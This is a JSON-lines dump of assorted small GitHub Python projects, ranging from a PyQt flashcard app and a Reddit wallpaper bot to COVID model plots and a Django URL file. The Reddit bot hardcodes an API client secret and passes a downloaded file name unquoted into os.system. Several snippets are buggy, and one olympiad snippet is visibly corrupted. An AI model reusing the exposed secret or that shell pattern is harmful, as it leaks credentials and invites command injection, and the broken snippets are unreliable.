__ne__(self, a):\n if self.title != a.title or \\\n self.type != a.type or \\\n self.message != a.message or \\\n self.timeout != a.timeout:\n return True\n return False\n\nclass IPTVPlayerNotificationList(object):\n \n def __init__(self):\n self.notificationsList = []\n self.mainLock = threading.Lock()\n # this flag will be checked with mutex taken \n # to less lock check\n self.empty = True\n \n def clearQueue(self):\n with self.mainLock:\n self.notificationsList = []\n self.empty = True\n \n def isEmpty(self):\n try:\n if self.empty:\n return True\n except Exception:\n pass\n return False\n \n def push(self, message, type=\"message\", timeout=5): #, allowDuplicates=True\n ret = False\n with self.mainLock:\n try:\n notification = IPTVPlayerNotification('IPTVPlayer', message, type, timeout)\n self.notificationsList.append(notification)\n self.empty = False\n ret = True\n except Exception:\n print(str(e))\n return ret\n\n def pop(self, popAllSameNotificationsAtOnce=True):\n notification = None\n with self.mainLock:\n try:\n notification = self.notificationsList.pop()\n if 
popAllSameNotificationsAtOnce:\n newList = []\n for item in self.notificationsList:\n if item != notification:\n newList.append(item)\n self.notificationsList = newList\n except Exception as e:\n print(str(e))\n \n if 0 == len(self.notificationsList):\n self.empty = True\n return notification\n\ngIPTVPlayerNotificationList = IPTVPlayerNotificationList()\ndef GetIPTVNotify():\n global gIPTVPlayerNotificationList\n return gIPTVPlayerNotificationList\n \nclass IPTVPlayerSleep(object):\n \n def __init__(self):\n self.mainLock = threading.Lock()\n self.timeout = 0\n self.startTimestamp = 0\n \n def Sleep(self, timeout, blocking=True):\n tmp = float(timeout)\n with self.mainLock:\n self.timeout = timeout\n self.startTimestamp = time.time()\n if blocking: time.sleep(self.timeout)\n \n def Reset(self):\n with self.mainLock:\n self.startTimestamp = 0\n \n def getTimeout(self):\n ret = 0\n with self.mainLock:\n if self.timeout != 0:\n ret = int(self.timeout - (time.time() - self.startTimestamp))\n if ret <= 0:\n self.timeout = 0\n ret = 0\n return ret\n \ngIPTVPlayerSleep = IPTVPlayerSleep()\ndef GetIPTVSleep():\n global gIPTVPlayerSleep\n return gIPTVPlayerSleep\n \n \n","repo_name":"j00zek/crossplatform_iptvplayer","sub_path":"IPTVplayer/icomponents/iptvplayerinit.py","file_name":"iptvplayerinit.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"22106386826","text":"from utils.repo import Repository\nimport sqlite3\nfrom sqlite3 import Error\nfrom domain.Assignment import Assignment\nimport time\nimport datetime\n\n\nclass AssignmentSqlRepo(Repository):\n def __init__(self, database, table):\n super().__init__()\n self._database = database\n self._connection = self.create_connection()\n self._loadDatabase()\n\n def create_connection(self):\n conn = None\n try:\n conn = sqlite3.connect(self._database)\n except Error as e:\n raise e\n return conn\n\n def _loadDatabase(self):\n current = self._connection.cursor()\n current.execute('SELECT * FROM assignments')\n rows = current.fetchall()\n for row in rows:\n timp = datetime.datetime.fromtimestamp(row[2])\n self._objects.append(Assignment(row[0], row[1], timp))\n\n def store(self, obj):\n Repository.store(self, obj)\n obj = (obj.Id, obj.Description, time.mktime(obj.Deadline.timetuple()))\n sql = '''INSERT INTO assignments (id, description, deadline) VALUES (?, ?, ?)'''\n current = self._connection.cursor()\n current.execute(sql, obj)\n self._connection.commit()\n\n def update(self, obj):\n Repository.update(self, obj)\n obj = (obj.Description, time.mktime(obj.Deadline.timetuple()), obj.Id)\n sql = '''UPDATE assignments\n SET description = ? ,\n deadline = ? \n WHERE id = ?'''\n current = self._conn.cursor()\n current.execute(sql, obj)\n self._connection.commit()\n\n def delete(self, objID):\n Repository.delete(self, objID)\n sql = 'DELETE FROM assignments WHERE id = ?'\n current = self._connection.cursor()\n current.execute(sql, (objID,))\n self._connection.commit()\n","repo_name":"Taveeh/Fundamentals-of-Programming","sub_path":"Assignment 6 - 9/DatabaseRepos/AssignmentDatabaseRepo.py","file_name":"AssignmentDatabaseRepo.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"9175581035","text":"from src.stanford_lib.Controller import Controller\nfrom src.stanford_lib.State import BehaviorState\nimport numpy as np\n\nclass FollowController(Controller):\n def __init__(self, config, inverse_kinematics):\n super().__init__(config, inverse_kinematics)\n\n self.in_follow_state = False\n self.following = False\n self.rx_ = 0.0\n self.ry_ = 0.0\n self.lx_ = 0.0\n self.ly_ = 0.0\n\n self.l_alpha = 0.15\n self.r_alpha = 0.1\n \n self.eps = 0.5\n self.slow_down_distance = 1.0\n \n # probably from config file to get cam_skip_frames, distance \n self.camera_module = Camera_serial(cam_skip_frames=100, distance=100)\n\n \n def run(self, state, command):\n if command.follow_event:\n if self.in_follow_state == False:\n self.in_follow_state = True\n command.stand_event = True\n super().run(state, command)\n print(\"t pressed, in_follow_state entered\")\n else: \n self.in_follow_state = False\n super().run(state, command)\n print(\"t pressed, in_follow_state exited\")\n elif self.in_follow_state:\n\n if command.start_stop_following_event and self.following == False:\n self.following = True\n self.count = 0\n print(\"u pressed, following started\")\n elif command.start_stop_following_event and self.following == True:\n command.stand_event = True\n self.following = False\n super().run(state, command)\n print(\"u pressed, following exited\")\n\n if self.following:\n delta_yaw, depth = 0,0\n \n \n\n def depth_fn(d):\n # v1. slows down linearly between slow_down_distance and eps\n # if d > self.slow_down_distance:\n # return 1\n # elif d < self.slow_down_distance:\n # return (d-self.eps)/(self.slow_down_distance-self.eps)\n # else:\n # return 0\n # v2. stops at eps\n if d > self.eps:\n return 1\n else:\n return 0\n\n \n # self.lx_ = self.l_alpha * 0 + (1 - self.l_alpha) * self.lx_ # no straffing\n how_far = depth_fn(depth)\n \n self.ly_ = self.l_alpha * how_far + (1 - self.l_alpha) * self.ly_ # l_alpha*1 for forward. l_alpha*-1 for backward\n\n if how_far != 0: \n x_vel = self.ly_ * self.config.max_x_velocity\n y_vel = self.lx_ * -self.config.max_y_velocity\n command.horizontal_velocity = np.array([x_vel, y_vel])\n\n self.rx_ = self.r_alpha * delta_yaw + (1 - self.r_alpha) * self.rx_ #r_alpha*1 for right. r_alpha*-1 for left\n command.yaw_rate = self.rx_ * self.config.max_yaw_rate\n if state.behavior_state != BehaviorState.TROT:\n command.trot_event = True\n\n super().run(state, command)\n else:\n print(\"goal reached!\")\n command.stand_event = True\n super().run(state, command)\n \n \n else:\n super().run(state, command)\n","repo_name":"JaredDiCioccio/cs685_pupper_project","sub_path":"src/pupper_controller/src/stanford_lib/FollowController.py","file_name":"FollowController.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16914213546","text":"import matplotlib.pyplot as plt\nimport SIRX\nimport numpy as np\nimport pickle, datetime\nimport fit_models\n\ns = fit_models.settings\ns[\"proj_date\"] = datetime.date( 2021, 3, 1 )#Sufficently far in the future for any peak\ndbase = fit_models.load_data( s )\n\nmx=0\nfig, (ax1, ax2) = plt.subplots(1, 2,figsize=(10,6.5))\nfor R0i,IFRi,ax in zip( [2.5,4.0],[1.25/100,0.7/100],[ax1,ax2]):\n\n s['R0'] = R0i\n s['IFR'] = IFRi\n data = fit_models.fit_model( dbase, s, do_plot=False)\n Q = data['Q']\n\n sirm = SIRX.SIRXConfirmedModel()\n\n\n days = np.arange(1,100)\n tt = np.logspace(np.log(days[0]), np.log(days[-1]), 1000,base=np.exp(1))\n\n eta = data['eta']\n rho = data['rho']\n kappa = data['kappa']\n kappa0 = data['kappa0']\n N = data['N']\n I0_factor = data['I0_factor']\n S0 = data['Sf']#Immune from current wave\n #S0 = 1.\n\n waves = [ 1., data['S0'], data['Sf'] ]\n results = []\n N0 = data['X0'] * N\n print(f\"N0={N0}\")\n\n for i,wave_i in enumerate(waves):\n result = sirm.SIRX( tt , N0, eta, rho, kappa, kappa0, N, I0_factor, wave_i)\n X = result[2,:]*N\n I = result[1,:]*N\n S = result[0,:]*N\n Z = result[3,:]*N\n results.append(result)\n\n ax.plot( tt, X/data['scaling_factor'], label=f\"$S_0$={wave_i:1.2f} (wave {i+1})\",lw=2 )\n mx = max( mx, np.max( X/data['scaling_factor']) )\n ax.set_title(f\"$R_0$={R0i:1.2f}, $IFR$={IFRi*100:1.2f}%, $Q$={Q:1.2f}, $X_{{a,0}}$={int(N0):,}\",fontsize=15)\n ax.set_xlabel(\"Day\", fontsize=16)\n ax.set_ylabel('$H_a$', fontsize=16)\n #ax.set_yscale('log')\n ax.legend(frameon=False, fontsize=13,loc=2)\n\nax1.set_ylim( 0, 1.2*mx)\nax2.set_ylim( 0, 1.2*mx)\n\nplt.tight_layout()\nplt.savefig(\"simulated_third_wave_comparison.png\",dpi=300)\n\n\n","repo_name":"smeetsbart/covid-hospitalization-belgium","sub_path":"wave2/new_wave.py","file_name":"new_wave.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42719133373","text":"import praw\nimport save_image\nimport requests\nimport os\n\nearthpornURL = \"https://www.reddit.com/r/earthporn.json\"\n\nsecret = \"fDLs_DEOnKeYCKP5n3jJ_n5b474\"\nid = \"sDHrovagvROA8w\"\nredirect = \"http://webxstudio.in\"\n\nclient_auth = requests.auth.HTTPBasicAuth( id , secret )\n\nuserAgent = \"WallpaperBot by ganesh\"\n\nreddit = praw.Reddit(client_id = id, client_secret = secret, user_agent = userAgent)\n\n\ndef setWall(completename):\n os.system(\"/usr/bin/gsettings set org.gnome.desktop.background picture-uri \"+completename)\n\nfor listing in reddit.subreddit('earthporn').new(limit=1):\n\tcompletename = save_image.saveImage(listing.url)\n\tsetWall(completename)\n","repo_name":"gat786/POTD","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"37952143863","text":"import sys\r\nimport json\r\nimport random\r\nfrom PyQt5 import QtWidgets\r\nfrom PyQt5.QtWidgets import QInputDialog, QFileDialog, QMainWindow, QApplication, QButtonGroup\r\nfrom main_design_code import Ui_MainWindow\r\n\r\nclass main(QMainWindow):\r\n def __init__(self):\r\n super(main, self).__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n self.true = 0\r\n self.false = 0\r\n self.setGeometry(550,130,880,840)\r\n self.ui.btnBrowse.clicked.connect(self.onClickedBrowse)\r\n self.ui.btnAsk.clicked.connect(self.onClickedOrientation)\r\n self.ui.btnCheck.clicked.connect(lambda : self.onClickedCheck(key,val))\r\n self.ui.btnFinish.clicked.connect(self.onClickedFinish)\r\n self.ui.btnAdd.clicked.connect(lambda : self.addWord(file_))\r\n self.ui.btnDelete.clicked.connect(lambda : self.deleteWord(file_))\r\n self.ui.btnSave.clicked.connect(lambda : self.saveFile(file_))\r\n self.ui.btnCreate.clicked.connect(self.createFile)\r\n self.ui.rbWordDefinition.pressed.connect(self.onClickedAsk)\r\n self.ui.rbDefinitionWord.pressed.connect(self.onClickedAsk2)\r\n\r\n self.group = QButtonGroup()\r\n self.group.addButton(self.ui.rbWordDefinition)\r\n self.group.addButton(self.ui.rbDefinitionWord) \r\n\r\n try:\r\n self.ui.wordInput.returnPressed.connect(lambda : self.onClickedCheck(key,val))\r\n self.ui.etAddDefinition.returnPressed.connect(lambda : self.addWord(file_))\r\n self.ui.etDeleteWord.returnPressed.connect(lambda : self.deleteWord(file_))\r\n self.ui.etFilneName.returnPressed.connect(lambda : self.saveFile(file_))\r\n except KeyError:\r\n pass\r\n\r\n def createFile(self):\r\n global file_\r\n file_ = {}\r\n global tempFile\r\n tempFile = {}\r\n self.ui.lblFileCreated.setText(\"Your file has been created. Before you can start the game, you must add a word below. You can save your file later if you wish.\")\r\n self.ui.btnAdd.setEnabled(True)\r\n if len(file_) > 0:\r\n self.ui.btnSave.setEnabled(True)\r\n self.ui.btnAsk.setEnabled(True)\r\n return file_\r\n\r\n def saveFile(self, file_):\r\n fileName = self.ui.etFilneName.text()\r\n try:\r\n with open(fileName, \"w\", encoding=\"utf-8\") as f:\r\n json.dump(file_, f)\r\n self.ui.lblFileSaved.setText(f\"File {fileName} has been saved.\")\r\n except FileNotFoundError:\r\n self.ui.lblFileSaved.setText(\"The filename cannot be a space. Please enter a usable name.\")\r\n return file_\r\n\r\n def deleteWord(self, file_):\r\n wordToDeleted = self.ui.etDeleteWord.text()\r\n try: \r\n file_.pop(wordToDeleted) \r\n self.ui.lblWordDeleted.setText(f\"{wordToDeleted} has been deleted.\")\r\n self.ui.etDeleteWord.setText(\"\")\r\n self.ui.btnSave.setEnabled(True)\r\n except KeyError:\r\n self.ui.lblWordDeleted.setText(f\"The word {wordToDeleted} doesn't already exist in your file.\")\r\n self.ui.etDeleteWord.setText(\"\")\r\n if len(file_) == 0:\r\n self.ui.btnSave.setEnabled(False)\r\n self.ui.btnAsk.setEnabled(False)\r\n self.ui.btnCheck.setEnabled(False)\r\n self.ui.btnFinish.setEnabled(False)\r\n self.ui.btnDelete.setEnabled(False)\r\n self.ui.rbWordDefinition.setEnabled(False)\r\n self.ui.rbDefinitionWord.setEnabled(False)\r\n return file_\r\n\r\n def addWord(self,file_):\r\n WordToAdd = self.ui.etAddWord.text()\r\n definitionToAdd = self.ui.etAddDefinition.text()\r\n if len(WordToAdd) == 0 or len(definitionToAdd) == 0:\r\n self.ui.lblWordAdded.setText(\"You cannot add a space. 
Please enter a word and its meaning.\")\r\n else:\r\n file_[WordToAdd] = definitionToAdd\r\n self.ui.lblWordAdded.setText(f\"{WordToAdd} has been added.\")\r\n self.ui.etAddWord.setText(\"\")\r\n self.ui.etAddDefinition.setText(\"\")\r\n self.ui.btnAsk.setEnabled(True)\r\n tempFile.update(file_)\r\n if len(file_) > 0:\r\n self.ui.btnDelete.setEnabled(True)\r\n self.ui.btnSave.setEnabled(True)\r\n self.ui.rbWordDefinition.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(True)\r\n return file_\r\n \r\n def onClickedFinish(self):\r\n self.ui.lblResult.setText(f\"{self.true} true, {self.false} false\")\r\n self.ui.btnCheck.setEnabled(False)\r\n self.ui.rbWordDefinition.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(True)\r\n\r\n def onClickedBrowse(self):\r\n filen = QFileDialog.getOpenFileName()\r\n path = filen[0]\r\n fileName2 = path.split(\"/\")\r\n global file_\r\n global tempFile\r\n tempFile = {}\r\n with open(path, encoding= \"utf-8\") as f:\r\n file_ = json.load(f)\r\n self.ui.lblBrowseRead.setText(f\"{fileName2[-1]} has been read.\")\r\n self.ui.etFilneName.setText(fileName2[-1])\r\n tempFile.update(file_)\r\n if len(file_) > 0:\r\n self.ui.btnDelete.setEnabled(True)\r\n self.ui.btnAsk.setEnabled(True)\r\n self.ui.btnAdd.setEnabled(True)\r\n self.ui.rbWordDefinition.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(True)\r\n self.ui.btnBrowse.setEnabled(False)\r\n self.ui.btnCreate.setEnabled(False)\r\n\r\n def onClickedOrientation(self):\r\n if self.ui.rbWordDefinition.isChecked():\r\n self.group.setExclusive(True) \r\n self.ui.btnAsk.clicked.connect(self.onClickedAsk)\r\n elif self.ui.rbDefinitionWord.isChecked():\r\n self.group.setExclusive(True) \r\n self.ui.btnAsk.clicked.connect(self.onClickedAsk2)\r\n\r\n def onClickedAsk(self):\r\n self.ui.wordInput.clear()\r\n global key,val\r\n key, val = random.choice(list(tempFile.items()))\r\n self.ui.lblAnswer.setText(\" \")\r\n self.ui.lblQuestionWord.setText(key)\r\n self.ui.btnCheck.setEnabled(True)\r\n self.ui.btnFinish.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(False)\r\n return key, val\r\n \r\n def onClickedAsk2(self):\r\n self.ui.wordInput.clear()\r\n global key,val\r\n key, val = random.choice(list(tempFile.items()))\r\n self.ui.lblAnswer.setText(\" \")\r\n self.ui.lblQuestionWord.setText(val)\r\n self.ui.btnCheck.setEnabled(True)\r\n self.ui.btnFinish.setEnabled(True)\r\n self.ui.rbWordDefinition.setEnabled(False)\r\n return key, val\r\n\r\n def onClickedCheck(self,key,val):\r\n reply = self.ui.wordInput.text()\r\n self.ui.btnCheck.setEnabled(False)\r\n \r\n if self.ui.rbWordDefinition.isChecked():\r\n if reply == val:\r\n self.ui.lblAnswer.setText(\"Right\")\r\n self.true += 1\r\n try:\r\n tempFile.pop(key)\r\n except KeyError:\r\n pass\r\n else:\r\n self.ui.lblAnswer.setText(f\"Wrong. The answer is {val}.\")\r\n self.false += 1\r\n elif self.ui.rbDefinitionWord.isChecked():\r\n if reply == key:\r\n self.ui.lblAnswer.setText(\"Right\")\r\n self.true += 1\r\n try:\r\n tempFile.pop(key)\r\n except KeyError:\r\n pass\r\n else:\r\n self.ui.lblAnswer.setText(f\"Wrong. 
The answer is {key}.\")\r\n self.false += 1\r\n\r\n if len(tempFile) == 0:\r\n self.ui.btnAsk.setEnabled(False)\r\n self.ui.btnCheck.setEnabled(False)\r\n self.ui.lblResult.setText(f\"You used all the words.{self.true} true, {self.false} false\")\r\n\r\ndef flashCard():\r\n app = QApplication(sys.argv)\r\n win = main()\r\n win.show()\r\n sys.exit(app.exec_())\r\nflashCard()\r\n","repo_name":"uckocaman/kelimeKarti_flashcard","sub_path":"DesktopApp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"4922750297","text":"import numpy as np\nimport progressbar\nfrom multiprocessing import cpu_count, Pool\nfrom functools import partial\n\n\n# return the vector of labels (neg/0 or pos/1)\ndef get_class_vec(sentiment, length):\n if sentiment == 'neg':\n return np.zeros(length)\n else:\n return np.ones(length)\n\n\n# return the vocabulary for all movie reviews\ndef get_vocab(input_texts, cutoff_threshold=0):\n # para input_texts: list(list(str))\n # DATA_TAG: list(list(tuple(str,str)))\n # para cutoff_threshold: predetermined: 10546/63331 (>9)\n # return para: vocabulary list of all reviews\n # return type: list(str)\n freq_dict, vocab = dict(), list()\n\n bar = progressbar.ProgressBar()\n \n for t in bar(range(len(input_texts))):\n texts = input_texts[t]\n for text in texts:\n if text in freq_dict:\n freq_dict[text] += 1\n else:\n freq_dict[text] = 1\n for key, val in freq_dict.items():\n if val > cutoff_threshold:\n vocab.append(key)\n return vocab\n\n\n# return the vocabulart for all movie reviews (pair)\ndef get_vocab_bigram(input_texts, cutoff_threshold=0):\n # para input_texts: list(list(str))\n # DATA_TAG: list(list(tuple(str,str)))\n # para cutoff_threshold: predetermined: 10918/502596 (>14)\n # return para: vocabulary list of all reviews \n # return type: list(str)\n freq_dict, vocab = dict(), list()\n\n bar = progressbar.ProgressBar()\n\n for t in bar(range(len(input_texts))):\n texts = input_texts[t]\n for i in range(len(texts)-1):\n if (texts[i], texts[i+1]) in freq_dict:\n freq_dict[(texts[i], texts[i+1])] += 1\n else:\n freq_dict[(texts[i], texts[i+1])] = 1\n for key, val in freq_dict.items():\n if val > cutoff_threshold:\n vocab.append(key)\n return vocab\n\n\ndef get_vocab_count(input_texts):\n # return dict of vocabulary and counts\n vocab = dict()\n for texts in input_texts:\n for text in texts:\n if text in vocab:\n vocab[text] += 1\n else:\n vocab[text] = 1\n return vocab\n\n\n# return the matrix in which each row is a feature vector\ndef bag_words2vec_unigram(vocab, input_texts):\n # para input_texts: data & tags read from the text file\n # para input_texts: list(list(tuple(str,str)))\n # return para: dict or copus with freq\n vec2mat = np.zeros((len(input_texts), len(vocab)))\n\n # bar = progressbar.ProgressBar()\n NUM_PROCESS = cpu_count() * 3\n pool = Pool(processes=NUM_PROCESS)\n \n vec2mat = np.array(list(pool.map(partial(words2vec_unigram, vocab), input_texts)))\n\n return vec2mat\n\n\ndef bag_words2vec_unigram_naive(vocab, input_texts):\n vec2mat = []\n for text in input_texts:\n vec2mat.append(words2vec_unigram(vocab, text))\n return np.array(vec2mat)\n\n\n# return the feature vector\ndef words2vec_unigram(vocab, input_text):\n # para input_texts: data & tags read from the text file\n # para input_texts: list(list(tuple(str,str)))\n # return para: dict or copus with freq\n # return type: list[integer]\n vec_unigram = [0]*len(vocab) # vector for each review\n for word in input_text:\n if word in vocab:\n vec_unigram[vocab.index(word)] += 1 # frequency\n return vec_unigram\n\n\n# return the matrix in which each row is a feature vector (bigram)\ndef bag_words2vec_bigram(vocab, input_texts):\n # para input_texts: data & tags read from the text file\n # para input_texts: list(list(tuple(str,str)))\n # para texts: data & tags read from the text file\n # return para: dict or copus with freq\n vec2mat = np.zeros((len(input_texts), len(vocab)))\n\n # bar = progressbar.ProgressBar()\n NUM_PROCESS = cpu_count() * 3\n pool = Pool(processes=NUM_PROCESS)\n\n 
vec2mat = np.array(list(pool.map(partial(words2vec_bigram, vocab), input_texts)))\n \n return vec2mat\n\n\ndef bag_words2vec_bigram_naive(vocab, input_texts):\n vec2mat = []\n for text in input_texts:\n vec2mat.append(words2vec_bigram(vocab, text))\n return np.array(vec2mat)\n\n\n# return the feature vector (bigram)\ndef words2vec_bigram(vocab, input_text):\n # para input_text: data & tags read from the text file\n # para input_text: list(tuple(str,str))\n # return para: dict or copus with freq\n # return type: list[integer]\n vec_bigram = [0]*len(vocab)\n for i in range(len(input_text)-1):\n if (input_text[i], input_text[i+1]) in vocab:\n vec_bigram[vocab.index((input_text[i], input_text[i+1]))] += 1\n return vec_bigram\n\n\ndef visual_matrix(vocab, vec2mat):\n # just visualise first text\n print(\"--\"*20)\n print(\"word&tag\\t\\t\\tcount\")\n for i in range(len(vocab)):\n print(str(vocab[i]).ljust(32), vec2mat[0][i])\n\n\ndef visual_matrix_bigram(vocab, vec2mat):\n # just visualise first text\n print(\"--\"*20)\n print(\"word&tag\\tword&tag\\t\\t\\tcount\")\n for i in range(len(vocab)):\n print(vocab[i][0], vocab[i][1], str(vec2mat[0][i]).rjust(30))\n\n\ndef concatenate_feat(vec2mat_uni, vec2mat_bi):\n vec2mat = list()\n for i in range(len(vec2mat_bi)):\n vec2mat.append(vec2mat_uni[i] + vec2mat_bi[i])\n return vec2mat\n","repo_name":"KrishnaUpadhyay36/Sentimental-analysis","sub_path":"src/bow_feat.py","file_name":"bow_feat.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24237759912","text":"# READING LINE BY LINE\r\n\r\nfilename = 'PI.txt'\r\ncount = 0\r\nwith open(filename) as file_object:\r\n for line in file_object:\r\n count += 1\r\n print(f\"{count}.line {line.rstrip()}\") # WE USE RSTRIP FOR REMOVE BLANK SPACE BETWEEN EVERY LINES DELETE AND SEE !!!!!\r\n\r\n# MAKING A LIST FROM A FILE\r\nprint(\"\\n\")\r\ncount = 0\r\nwith open(filename) as file_object:\r\n lines = file_object.readlines() # USE !!!!! READLINE() AND SEE WHAT HAPPENS !!!!!\r\n everyline = file_object.readline() # SEE WHAT HAPPENS WHEN WE WANT TO READ AGAIN !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nfor line in lines:\r\n count += 1\r\n print(f\"{count}.line \" + line.rstrip())\r\nprint(lines)\r\nprint(everyline) # WE WON'T SEE ANYTHING IN THE CONSOLE !!!!!\r\n\r\nwith open(filename) as file_object:\r\n lines = file_object.readline()\r\n everyline = file_object.readlines() # SEE WHAT HAPPENS WHEN WE WANT TO READ AGAIN !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\ncount = 0\r\nfor line in lines:\r\n count += 1\r\n print(f\"{count}.line \" + line.rstrip())\r\nprint(lines)\r\nprint(everyline)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"egesss/Python-Study","sub_path":"Files/Files2.py","file_name":"Files2.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72329653346","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom drf_spectacular.views import SpectacularAPIView, SpectacularRedocView, SpectacularSwaggerView\n\n\nurlpatterns = [\n path('api/admin/', admin.site.urls),\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n path('api/swagger/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('api/redoc/', SpectacularRedocView.as_view(url_name='schema'), name='redoc'),\n\n path('api/user/', include('apps.users.urls')),\n path('api/warehouse/', include('apps.warehouse.urls')),\n path('api/sales/', include('apps.sales.urls')),\n path('api/finance/', include('apps.finance.urls')),\n path('api/dashboard/', include('apps.dashboard.urls')),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"code19m/project9028","sub_path":"backEnd/config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39658792848","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 6 22:06:56 2020\n\n@author: Laraib\n\"\"\"\nimport os\nimport csv\n\n\n\n# --------------- NEW_SHEET_CREATION --------------- #\ndef create_sheets(username, filename):\n filename = filename +\".csv\"\n filename = \"Instructors/\" + username + '/' + filename\n #print(filename)\n flag = None\n with open(filename, \"w\", newline=\"\") as file:\n content = csv.writer(file)\n try:\n content.writerow(['Reg_no', 'Name', 'Date', 'Time', 'Attendance'])\n #print(\"File created successfully\")\n flag = True\n except Exception:\n #print(\"File DID NOT create successfully\")\n flag = False\n return flag\n#create_sheets(\"mona\", \"f16B\")\n\n\n\n\n\n# --------------- CHECKING_FOR_NOT_TO_DUPLICATE_FILE_NAME --------------- #\ndef check_filename(username, filename):\n flag = None\n filename = filename + \".csv\"\n dirName = \"./Instructors/\" + username\n # Get the list of all files in directory tree at given path\n listOfFiles = os.listdir(dirName)\n #print(len(listOfFiles))\n #rint(listOfFiles)\n #print(filename)\n \n for f in listOfFiles:\n if filename == f.lower():\n flag = True\n #print(\"File Exists\")\n else:\n flag = False\n #print(\"File Does not Exist\")\n if(flag):\n break\n return flag\n#check_filename(\"mona\", \"f16b.csv\")\n\n\n\n\n\n# --------------- CHECKING_IF_THERE_IS_ANY_FILE_IN_INSTRUCTOR'S_FOLDER_OR_NOT --------------- #\ndef return_listoffiles(uname):\n dirName = \"./Instructors/\" + uname\n # Get the list of all files in directory tree at given path\n listOfFiles = os.listdir(dirName)\n return listOfFiles\n\n\n","repo_name":"LaraibSaleem/AutomaticAttendanceUsingFacialRecognition","sub_path":"att_sheet_methods.py","file_name":"att_sheet_methods.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43056795548","text":"#-----------------------------\r\n# Fake Mouse\r\n# Creator: Brian Walheim\r\n# Version: 1.0\r\n#\r\n# Moves mouse randomly around the screen\r\n#-----------------------------\r\n\r\n#-------------\r\n#Imports\r\n#-------------\r\n\r\n#Pygame Imports\r\nfrom pynput.mouse import Button, Controller\r\nimport pygame\r\n\r\n#Misc\r\nimport time\r\nimport random\r\nimport sys\r\n\r\n#------------\r\n#Variables\r\n#------------\r\n\r\n#Mouse Variables\r\nmouse = Controller()\r\nactive = False\r\n\r\n#Starts Pygame\r\npygame.init()\r\npygame.display.set_mode((50,50))\r\n\r\n#-----------\r\n#Functions\r\n#-----------\r\n\r\n#Moves the mouse small random increments\r\ndef mouseMove():\r\n\r\n mouse.move(random.randint(-10,10),random.randint(-10,10))\r\n time.sleep(0.1)\r\n\r\n#----------\r\n#Main\r\n#----------\r\n\r\n#Infinite Loop\r\nwhile True:\r\n\r\n if active:\r\n mouseMove()\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.display.quit()\r\n pygame.quit()\r\n sys.exit()\r\n elif event.key == pygame.K_BACKQUOTE:\r\n if not active:\r\n active = True\r\n else:\r\n active = False\r\n\r\n\r\n\r\n","repo_name":"bwalheim1205/Fake-Mouse","sub_path":"Fake Mouse.pyw","file_name":"Fake Mouse.pyw","file_ext":"pyw","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17297177926","text":"from itertools import combinations as comb\nfrom sys import exit\n \n \ndef answer(ans=0):\n\tif ans:\n\t\tprint(\"YES\")\n\t\tprint(ans)\n\telse:\n\t\tprint(\"NO\")\n\texit()\n \n \ndef good(tpl):\n\tx=tpl[0]\n\ty=tpl[1]\n\tz=tpl[2]\n\tif x=0:\n\tqq=z[i:i+6]\n\tq=list(comb(qq,3))\n\tl=0\n\tr=len(q)-1\n\twhile l=0:\n\tq=z[i:i+3]\n\tif good(q):\n\t\tp1=i\n\t\tbreak\n\ti-=1\n \n \nif p1:\n\tp2=0\n\ti-=3\n\twhile i>=0:\n\t\tq=z[i:i+3]\n\t\tif good(q):\n\t\t\tp2=i\n\t\t\tbreak\n\t\ti-=1\n \n\tif p2:\n\t\tanswer(sum(z[p1:p1+3])+sum(z[p2:p2+3]))\n\telse:\n\t\tanswer()\nelse:\n\tanswer()\n \n","repo_name":"vrevt/Olympiad_code","sub_path":"python/easy.py","file_name":"easy.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
